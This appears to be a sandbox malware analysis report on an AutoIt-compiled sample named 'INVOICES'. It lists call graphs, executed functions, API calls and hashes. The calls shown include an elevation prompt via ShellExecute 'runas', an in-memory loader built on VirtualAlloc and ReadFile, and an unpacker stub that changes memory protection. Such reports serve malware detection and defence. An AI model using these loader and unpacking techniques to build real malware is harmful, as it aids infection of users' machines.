99860 7940d3 99858->99860 99862 7377c7 59 API calls 99859->99862 99861 7381a7 59 API calls 99860->99861 99864 7940dc Mailbox 99861->99864 99863 7940e9 99862->99863 99865 7377c7 59 API calls 99863->99865 99864->99841 99866 7940f1 99865->99866 99867 7377c7 59 API calls 99866->99867 99868 7940fc 99867->99868 99869 7377c7 59 API calls 99868->99869 99870 794104 99869->99870 99871 7377c7 59 API calls 99870->99871 99872 79410c 99871->99872 99873 7377c7 59 API calls 99872->99873 99874 794114 99873->99874 99875 7377c7 59 API calls 99874->99875 99876 79411c 99875->99876 99877 7377c7 59 API calls 99876->99877 99878 794124 99877->99878 99879 7346f9 59 API calls 99878->99879 99880 79413b 99879->99880 99881 7346f9 59 API calls 99880->99881 99882 794154 99881->99882 99883 737b52 59 API calls 99882->99883 99884 794160 99883->99884 99885 794173 99884->99885 99886 737e8c 59 API calls 99884->99886 99887 737b52 59 API calls 99885->99887 99886->99885 99888 79417c 99887->99888 99889 79418c 99888->99889 99890 737e8c 59 API calls 99888->99890 99891 7381a7 59 API calls 99889->99891 99890->99889 99892 794198 99891->99892 99893 737c8e 59 API calls 99892->99893 99894 7941a4 99893->99894 99969 794264 59 API calls 99894->99969 99896 7941b3 99970 794264 59 API calls 99896->99970 99898 7941c6 99899 737b52 59 API calls 99898->99899 99900 7941d0 99899->99900 99901 7941d5 99900->99901 99902 7941e7 99900->99902 99903 737e0b 59 API calls 99901->99903 99904 737b52 59 API calls 99902->99904 99910 7941e2 99903->99910 99905 7941f0 99904->99905 99906 79420e 99905->99906 99909 737e0b 59 API calls 99905->99909 99908 737c8e 59 API calls 99906->99908 99907 737c8e 59 API calls 99907->99906 99908->99864 99909->99910 99910->99907 99912 79920b __write_nolock 99911->99912 99913 750f36 Mailbox 59 API calls 99912->99913 99914 799268 99913->99914 99915 73538e 59 API calls 99914->99915 99916 799272 99915->99916 99917 799008 GetSystemTimeAsFileTime 99916->99917 99918 79927d 99917->99918 99919 735045 85 API calls 99918->99919 99920 799290 _wcscmp 99919->99920 99921 799361 99920->99921 99922 7992b4 99920->99922 99923 7997dd 96 API calls 99921->99923 99924 7997dd 96 API calls 99922->99924 99939 79932d _wcscat 99923->99939 99925 7992b9 99924->99925 99928 79936a 99925->99928 99988 75426e 58 API calls __wsplitpath_helper 99925->99988 99927 73506b 74 API calls 99929 799386 99927->99929 99928->99848 99930 73506b 74 API calls 99929->99930 99932 799396 99930->99932 99931 7992e2 _wcscat _wcscpy 99989 75426e 58 API calls __wsplitpath_helper 99931->99989 99933 73506b 74 API calls 99932->99933 99935 7993b1 99933->99935 99936 73506b 74 API calls 99935->99936 99937 7993c1 99936->99937 99938 73506b 74 API calls 99937->99938 99940 7993dc 99938->99940 99939->99927 99939->99928 99941 73506b 74 API calls 99940->99941 99942 7993ec 99941->99942 99943 73506b 74 API calls 99942->99943 99944 7993fc 99943->99944 99945 73506b 74 API calls 99944->99945 99946 79940c 99945->99946 99971 79998c GetTempPathW GetTempFileNameW 99946->99971 99948 799418 99949 7553cb 115 API calls 99948->99949 99960 799429 99949->99960 99950 7994e3 99951 755516 __fcloseall 83 API calls 99950->99951 99952 7994ee 99951->99952 99954 799508 99952->99954 99955 7994f4 DeleteFileW 99952->99955 99953 73506b 74 API calls 99953->99960 99956 7995ae CopyFileW 99954->99956 99961 799512 _wcsncpy 99954->99961 99955->99928 99957 7995c4 DeleteFileW 99956->99957 99958 7995d6 DeleteFileW 99956->99958 99957->99928 99985 79994b CreateFileW 99958->99985 99960->99928 99960->99950 99960->99953 99972 7549d3 99960->99972 99990 798baf 116 API calls __fcloseall 99961->99990 99964 799599 99964->99958 99965 79959d DeleteFileW 99964->99965 99965->99928 99966->99774 99967->99810 99968->99823 99969->99896 99970->99898 99971->99948 99973 7549df __initptd 99972->99973 99974 754a15 99973->99974 99975 7549fd 99973->99975 99977 754a0d __initptd 99973->99977 99978 756d8e __lock_file 59 API calls 99974->99978 100003 758ca8 58 API calls __getptd_noexit 99975->100003 99977->99960 99980 754a1b 99978->99980 99979 754a02 100004 758f36 9 API calls __write_nolock 99979->100004 99991 75487a 99980->99991 99986 799971 SetFileTime CloseHandle 99985->99986 99987 799987 99985->99987 99986->99987 99987->99928 99988->99931 99989->99939 99990->99964 99994 754889 99991->99994 99997 7548a7 99991->99997 99992 754897 100006 758ca8 58 API calls __getptd_noexit 99992->100006 99994->99992 99994->99997 100001 7548c1 _memmove 99994->100001 99995 75489c 100007 758f36 9 API calls __write_nolock 99995->100007 100005 754a4d RtlLeaveCriticalSection RtlLeaveCriticalSection __wfsopen 99997->100005 99999 754bad __flush 78 API calls 99999->100001 100000 754856 __fseek_nolock 58 API calls 100000->100001 100001->99997 100001->99999 100001->100000 100002 75da06 __write 78 API calls 100001->100002 100008 75af9e 78 API calls 6 library calls 100001->100008 100002->100001 100003->99979 100004->99977 100005->99977 100006->99995 100007->99997 100008->100001 100010 737dbf __NMSG_WRITE 100009->100010 100012 737dd0 _memmove 100010->100012 100015 738189 59 API calls Mailbox 100010->100015 100012->98661 100013 76f060 _memmove 100014->98662 100015->100013 100017 737be5 _memmove 100016->100017 100018 737bbf 100016->100018 100017->98668 100017->100017 100018->100017 100019 750f36 Mailbox 59 API calls 100018->100019 100020 737c34 100019->100020 100021 750f36 Mailbox 59 API calls 100020->100021 100021->100017 100022->98669 100023 731078 100028 7371eb 100023->100028 100025 73108c 100026 752ec0 __cinit 67 API calls 100025->100026 100027 731096 100026->100027 100029 7371fb __write_nolock 100028->100029 100030 7377c7 59 API calls 100029->100030 100031 7372b1 100030->100031 100032 734864 61 API calls 100031->100032 100033 7372ba 100032->100033 100059 75068b 100033->100059 100036 737e0b 59 API calls 100037 7372d3 100036->100037 100038 733f84 59 API calls 100037->100038 100039 7372e2 100038->100039 100040 7377c7 59 API calls 100039->100040 100041 7372eb 100040->100041 100042 737eec 59 API calls 100041->100042 100043 7372f4 RegOpenKeyExW 100042->100043 100044 76ec0a RegQueryValueExW 100043->100044 100048 737316 Mailbox 100043->100048 100045 76ec27 100044->100045 100046 76ec9c RegCloseKey 100044->100046 100047 750f36 Mailbox 59 API calls 100045->100047 100046->100048 100058 76ecae _wcscat Mailbox __NMSG_WRITE 100046->100058 100049 76ec40 100047->100049 100048->100025 100050 73538e 59 API calls 100049->100050 100051 76ec4b RegQueryValueExW 100050->100051 100052 76ec68 100051->100052 100055 76ec82 100051->100055 100053 737d2c 59 API calls 100052->100053 100053->100055 100054 737b52 59 API calls 100054->100058 100055->100046 100056 737f41 59 API calls 100056->100058 100057 733f84 59 API calls 100057->100058 100058->100048 100058->100054 100058->100056 100058->100057 100060 761ac0 __write_nolock 100059->100060 100061 750698 GetFullPathNameW 100060->100061 100062 7506ba 100061->100062 100063 737d2c 59 API calls 100062->100063 100064 7372c5 100063->100064 100064->100036 100065 7744c8 100069 78625a 100065->100069 100067 7744d3 100068 78625a 85 API calls 100067->100068 100068->100067 100070 786267 100069->100070 100076 786294 100069->100076 100071 786296 100070->100071 100073 78629b 100070->100073 100070->100076 100078 78628e 100070->100078 100081 739488 84 API calls Mailbox 100071->100081 100074 739997 84 API calls 100073->100074 100075 7862a2 100074->100075 100077 737c8e 59 API calls 100075->100077 100076->100067 100077->100076 100080 739700 59 API calls _wcsstr 100078->100080 100080->100076 100081->100073 100082 94295b 100085 9425d0 100082->100085 100084 9429a7 100086 940000 GetPEB 100085->100086 100089 94266f 100086->100089 100088 9426a0 CreateFileW 100088->100089 100090 9426ad 100088->100090 100089->100090 100091 9426c9 VirtualAlloc 100089->100091 100096 9427d0 CloseHandle 100089->100096 100097 9427e0 VirtualFree 100089->100097 100098 9434e0 GetPEB 100089->100098 100093 9428bc VirtualFree 100090->100093 100094 9428ca 100090->100094 100091->100090 100092 9426ea ReadFile 100091->100092 100092->100090 100095 942708 VirtualAlloc 100092->100095 100093->100094 100094->100084 100095->100089 100095->100090 100096->100089 100097->100089 100099 94350a 100098->100099 100099->100088 100100 798db6 100101 798dc9 100100->100101 100102 798dc3 100100->100102 100104 798dda 100101->100104 100105 752ed5 _free 58 API calls 100101->100105 100103 752ed5 _free 58 API calls 100102->100103 100103->100101 100106 798dec 100104->100106 100107 752ed5 _free 58 API calls 100104->100107 100105->100104 100107->100106

                                                                                                                                  Executed Functions

                                                                                                                                  Function 00733B4C Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153windowCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00733B7A
                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 00733B8C
                                                                                                                                  • GetFullPathNameW.KERNEL32(00007FFF,?,?,007F52F8,007F52E0,?,?), ref: 00733BFD
                                                                                                                                    • Part of subcall function 00737D2C: _memmove.LIBCMT ref: 00737D66
                                                                                                                                    • Part of subcall function 00740A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00733C26,007F52F8,?,?,?), ref: 00740ACE
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00733C81
                                                                                                                                  • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,007E7770,00000010), ref: 0076D3EC
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,007F52F8,?,?,?), ref: 0076D424
                                                                                                                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,007E4260,007F52F8,?,?,?), ref: 0076D4AA
                                                                                                                                  • ShellExecuteW.SHELL32(00000000,?,?), ref: 0076D4B1
                                                                                                                                    • Part of subcall function 00733A58: GetSysColorBrush.USER32(0000000F), ref: 00733A62
                                                                                                                                    • Part of subcall function 00733A58: LoadCursorW.USER32(00000000,00007F00), ref: 00733A71
                                                                                                                                    • Part of subcall function 00733A58: LoadIconW.USER32(00000063), ref: 00733A88
                                                                                                                                    • Part of subcall function 00733A58: LoadIconW.USER32(000000A4), ref: 00733A9A
                                                                                                                                    • Part of subcall function 00733A58: LoadIconW.USER32(000000A2), ref: 00733AAC
                                                                                                                                    • Part of subcall function 00733A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00733AD2
                                                                                                                                    • Part of subcall function 00733A58: RegisterClassExW.USER32(?), ref: 00733B28
                                                                                                                                    • Part of subcall function 007339E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00733A15
                                                                                                                                    • Part of subcall function 007339E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00733A36
                                                                                                                                    • Part of subcall function 007339E7: ShowWindow.USER32(00000000,?,?), ref: 00733A4A
                                                                                                                                    • Part of subcall function 007339E7: ShowWindow.USER32(00000000,?,?), ref: 00733A53
                                                                                                                                    • Part of subcall function 007343DB: _memset.LIBCMT ref: 00734401
                                                                                                                                    • Part of subcall function 007343DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 007344A6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                                                                  • String ID: This is a third-party compiled AutoIt script.$runas$%|
                                                                                                                                  • API String ID: 529118366-4059233762
                                                                                                                                  • Opcode ID: 24fdd50d300ea14814df717c6d590cbc738d61d9ed94ff4ff68bfeb6ed56df75
                                                                                                                                  • Instruction ID: 3515ebd62ce5645d43d9638fb7a9a2ab75e111c59dbffc6aa60481a914c0629d
                                                                                                                                  • Opcode Fuzzy Hash: 24fdd50d300ea14814df717c6d590cbc738d61d9ed94ff4ff68bfeb6ed56df75
                                                                                                                                  • Instruction Fuzzy Hash: D55108B0E04288EAEF25EBB4DC09EFD7B74BB04700F008265FA51A6193DA7C5A01DB25
                                                                                                                                  Function 00733633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151timewindowregistryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 758 733633-733681 760 733683-733686 758->760 761 7336e1-7336e3 758->761 763 7336e7 760->763 764 733688-73368f 760->764 761->760 762 7336e5 761->762 765 7336ca-7336d2 NtdllDefWindowProc_W 762->765 766 76d24c-76d27a call 7411d0 call 7411f3 763->766 767 7336ed-7336f0 763->767 768 733695-73369a 764->768 769 73375d-733765 PostQuitMessage 764->769 776 7336d8-7336de 765->776 805 76d27f-76d286 766->805 771 7336f2-7336f3 767->771 772 733715-73373c SetTimer RegisterClipboardFormatW 767->772 773 7336a0-7336a2 768->773 774 76d2bf-76d2d3 call 79281f 768->774 770 733711-733713 769->770 770->776 777 76d1ef-76d1f2 771->777 778 7336f9-73370c KillTimer call 7344cb call 733114 771->778 772->770 779 73373e-733749 CreatePopupMenu 772->779 780 733767-733776 call 734531 773->780 781 7336a8-7336ad 773->781 774->770 799 76d2d9 774->799 785 76d1f4-76d1f6 777->785 786 76d228-76d247 MoveWindow 777->786 778->770 779->770 780->770 788 7336b3-7336b8 781->788 789 76d2a4-76d2ab 781->789 793 76d217-76d223 SetFocus 785->793 794 76d1f8-76d1fb 785->794 786->770 797 73374b-73375b call 7345df 788->797 798 7336be-7336c4 788->798 789->765 796 76d2b1-76d2ba call 787f5e 789->796 793->770 794->798 801 76d201-76d212 call 7411d0 794->801 796->765 797->770 798->765 798->805 799->765 801->770 805->765 806 76d28c-76d29f call 7344cb call 7343db 805->806 806->765
                                                                                                                                  APIs
                                                                                                                                  • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 007336D2
                                                                                                                                  • KillTimer.USER32(?,00000001), ref: 007336FC
                                                                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0073371F
                                                                                                                                  • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 0073372A
                                                                                                                                  • CreatePopupMenu.USER32 ref: 0073373E
                                                                                                                                  • PostQuitMessage.USER32(00000000), ref: 0073375F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                                                                                                                  • String ID: TaskbarCreated$%|
                                                                                                                                  • API String ID: 157504867-294584353
                                                                                                                                  • Opcode ID: bb7c075667c9ca5739421a7fa415f9e158475540a15f6310549d40c1eb2ae950
                                                                                                                                  • Instruction ID: 82dbc273d6f0857480acefed1e3e008a74c94f33536f278c32b560ba49153dc9
                                                                                                                                  • Opcode Fuzzy Hash: bb7c075667c9ca5739421a7fa415f9e158475540a15f6310549d40c1eb2ae950
                                                                                                                                  • Instruction Fuzzy Hash: AC41F1B2600509FFFB346B68EC4EB7A3B55FB04740F504225FB02862A3DA6CAE409765
                                                                                                                                  Function 00734FE9 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 62COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 950 734fe9-735001 CreateStreamOnHGlobal 951 735003-73501a FindResourceExW 950->951 952 735021-735026 950->952 953 735020 951->953 954 76dc8c-76dc9b LoadResource 951->954 953->952 954->953 955 76dca1-76dcaf SizeofResource 954->955 955->953 956 76dcb5-76dcc0 LockResource 955->956 956->953 957 76dcc6-76dce4 956->957 957->953
                                                                                                                                  APIs
                                                                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00734FF9
                                                                                                                                  • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00734EEE,?,?,00000000,00000000), ref: 00735010
                                                                                                                                  • LoadResource.KERNEL32(?,00000000,?,?,00734EEE,?,?,00000000,00000000,?,?,?,?,?,?,00734F8F), ref: 0076DC90
                                                                                                                                  • SizeofResource.KERNEL32(?,00000000,?,?,00734EEE,?,?,00000000,00000000,?,?,?,?,?,?,00734F8F), ref: 0076DCA5
                                                                                                                                  • LockResource.KERNEL32(Ns,?,?,00734EEE,?,?,00000000,00000000,?,?,?,?,?,?,00734F8F,00000000), ref: 0076DCB8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                  • String ID: SCRIPT$Ns
                                                                                                                                  • API String ID: 3051347437-724470426
                                                                                                                                  • Opcode ID: 16be628a778fcfa6de8aeb45a991e7972afe2dad12c181ef391e286ba9416b80
                                                                                                                                  • Instruction ID: 2f7be586ec879836e8122c71196a54791fd291664063d7359068ed23c73ce551
                                                                                                                                  • Opcode Fuzzy Hash: 16be628a778fcfa6de8aeb45a991e7972afe2dad12c181ef391e286ba9416b80
                                                                                                                                  • Instruction Fuzzy Hash: 8F117C75200704BFE7258B65DD48F6B7BB9FBC9B11F20826CF406D6260DB76EC008660
                                                                                                                                  Function 00734AFE Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1014 734afe-734b5e call 7377c7 GetVersionExW call 737d2c 1019 734b64 1014->1019 1020 734c69-734c6b 1014->1020 1021 734b67-734b6c 1019->1021 1022 76dac0-76dacc 1020->1022 1024 734b72 1021->1024 1025 734c70-734c71 1021->1025 1023 76dacd-76dad1 1022->1023 1026 76dad4-76dae0 1023->1026 1027 76dad3 1023->1027 1028 734b73-734baa call 737e8c call 737886 1024->1028 1025->1028 1026->1023 1029 76dae2-76dae7 1026->1029 1027->1026 1037 734bb0-734bb1 1028->1037 1038 76dbbd-76dbc0 1028->1038 1029->1021 1031 76daed-76daf4 1029->1031 1031->1022 1033 76daf6 1031->1033 1036 76dafb-76dafe 1033->1036 1039 734bf1-734c08 GetCurrentProcess IsWow64Process 1036->1039 1040 76db04-76db22 1036->1040 1037->1036 1041 734bb7-734bc2 1037->1041 1042 76dbc2 1038->1042 1043 76dbd9-76dbdd 1038->1043 1044 734c0a 1039->1044 1045 734c0d-734c1e 1039->1045 1040->1039 1046 76db28-76db2e 1040->1046 1047 76db43-76db49 1041->1047 1048 734bc8-734bca 1041->1048 1049 76dbc5 1042->1049 1050 76dbdf-76dbe8 1043->1050 1051 76dbc8-76dbd1 1043->1051 1044->1045 1053 734c20-734c30 call 734c95 1045->1053 1054 734c89-734c93 GetSystemInfo 1045->1054 1055 76db30-76db33 1046->1055 1056 76db38-76db3e 1046->1056 1059 76db53-76db59 1047->1059 1060 76db4b-76db4e 1047->1060 1057 734bd0-734bd3 1048->1057 1058 76db5e-76db6a 1048->1058 1049->1051 1050->1049 1052 76dbea-76dbed 1050->1052 1051->1043 1052->1051 1071 734c32-734c3f call 734c95 1053->1071 1072 734c7d-734c87 GetSystemInfo 1053->1072 1061 734c56-734c66 1054->1061 1055->1039 1056->1039 1065 734bd9-734be8 1057->1065 1066 76db8a-76db8d 1057->1066 1062 76db74-76db7a 1058->1062 1063 76db6c-76db6f 1058->1063 1059->1039 1060->1039 1062->1039 1063->1039 1069 76db7f-76db85 1065->1069 1070 734bee 1065->1070 1066->1039 1068 76db93-76dba8 1066->1068 1073 76dbb2-76dbb8 1068->1073 1074 76dbaa-76dbad 1068->1074 1069->1039 1070->1039 1079 734c41-734c45 GetNativeSystemInfo 1071->1079 1080 734c76-734c7b 1071->1080 1075 734c47-734c4b 1072->1075 1073->1039 1074->1039 1075->1061 1078 734c4d-734c50 FreeLibrary 1075->1078 1078->1061 1079->1075 1080->1079
                                                                                                                                  APIs
                                                                                                                                  • GetVersionExW.KERNEL32(?), ref: 00734B2B
                                                                                                                                    • Part of subcall function 00737D2C: _memmove.LIBCMT ref: 00737D66
                                                                                                                                  • GetCurrentProcess.KERNEL32(?,007BFAEC,00000000,00000000,?), ref: 00734BF8
                                                                                                                                  • IsWow64Process.KERNEL32(00000000), ref: 00734BFF
                                                                                                                                  • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00734C45
                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00734C50
                                                                                                                                  • GetSystemInfo.KERNEL32(00000000), ref: 00734C81
                                                                                                                                  • GetSystemInfo.KERNEL32(00000000), ref: 00734C8D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000856000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1421015871.000000000085D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_730000_INVOICES.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1986165174-0
                                                                                                                                  • Opcode ID: 718b219a1ef248ca2aab8fe391ea4b83d7384c599046546eb6a8e5b5f6d345fb
                                                                                                                                  • Instruction ID: d0378b6d5a143e70c84bb15e81b0496a5d4b9fd53e4e4bd7085630ced41bb15f
                                                                                                                                  • Opcode Fuzzy Hash: 718b219a1ef248ca2aab8fe391ea4b83d7384c599046546eb6a8e5b5f6d345fb
                                                                                                                                  • Instruction Fuzzy Hash: 6291E87194A7C4DED735CB7884515AAFFE5AF26300F488E9DD4CB93A42D228F908C729
                                                                                                                                  Function 0085CA00 Relevance: 7.7, APIs: 5, Instructions: 206librarymemoryloaderCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1106 85ca00-85ca0d 1107 85ca1a-85ca1f 1106->1107 1108 85ca21 1107->1108 1109 85ca10-85ca15 1108->1109 1110 85ca23 1108->1110 1111 85ca16-85ca18 1109->1111 1112 85ca28-85ca2a 1110->1112 1111->1107 1111->1108 1113 85ca33-85ca37 1112->1113 1114 85ca2c-85ca31 1112->1114 1115 85ca44-85ca47 1113->1115 1116 85ca39 1113->1116 1114->1113 1119 85ca50-85ca52 1115->1119 1120 85ca49-85ca4e 1115->1120 1117 85ca63-85ca68 1116->1117 1118 85ca3b-85ca42 1116->1118 1121 85ca7b-85ca7d 1117->1121 1122 85ca6a-85ca73 1117->1122 1118->1115 1118->1117 1119->1112 1120->1119 1125 85ca86 1121->1125 1126 85ca7f-85ca84 1121->1126 1123 85ca75-85ca79 1122->1123 1124 85caea-85caed 1122->1124 1123->1125 1127 85caf2-85caf5 1124->1127 1128 85ca54-85ca56 1125->1128 1129 85ca88-85ca8b 1125->1129 1126->1125 1132 85caf7-85caf9 1127->1132 1130 85ca5f-85ca61 1128->1130 1131 85ca58-85ca5d 1128->1131 1133 85ca94 1129->1133 1134 85ca8d-85ca92 1129->1134 1136 85cab5-85cac4 1130->1136 1131->1130 1132->1127 1137 85cafb-85cafe 1132->1137 1133->1128 1135 85ca96-85ca98 1133->1135 1134->1133 1139 85caa1-85caa5 1135->1139 1140 85ca9a-85ca9f 1135->1140 1141 85cad4-85cae1 1136->1141 1142 85cac6-85cacd 1136->1142 1137->1127 1138 85cb00-85cb1c 1137->1138 1138->1132 1143 85cb1e 1138->1143 1139->1135 1144 85caa7 1139->1144 1140->1139 1141->1141 1146 85cae3-85cae5 1141->1146 1142->1142 1145 85cacf 1142->1145 1147 85cb24-85cb28 1143->1147 1148 85cab2 1144->1148 1149 85caa9-85cab0 1144->1149 1145->1111 1146->1111 1150 85cb6f-85cb72 1147->1150 1151 85cb2a-85cb40 LoadLibraryA 1147->1151 1148->1136 1149->1135 1149->1148 1153 85cb75-85cb7c 1150->1153 1152 85cb41-85cb46 1151->1152 1152->1147 1154 85cb48-85cb4a 1152->1154 1155 85cba0-85cbd0 VirtualProtect * 2 1153->1155 1156 85cb7e-85cb80 1153->1156 1158 85cb53-85cb60 GetProcAddress 1154->1158 1159 85cb4c-85cb52 1154->1159 1157 85cbd4-85cbd8 1155->1157 1160 85cb93-85cb9e 1156->1160 1161 85cb82-85cb91 1156->1161 1157->1157 1162 85cbda 1157->1162 1163 85cb62-85cb67 1158->1163 1164 85cb69 ExitProcess 1158->1164 1159->1158 1160->1161 1161->1153 1163->1152
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(?), ref: 0085CB3A
                                                                                                                                  • GetProcAddress.KERNEL32(?,00855FF9), ref: 0085CB58
                                                                                                                                  • ExitProcess.KERNEL32(?,00855FF9), ref: 0085CB69
                                                                                                                                  • VirtualProtect.KERNELBASE(00730000,00001000,00000004,?,00000000), ref: 0085CBB7
                                                                                                                                  • VirtualProtect.KERNELBASE(00730000,00001000), ref: 0085CBCC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1421000117.000000000085C000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1420866422.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1420879725.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
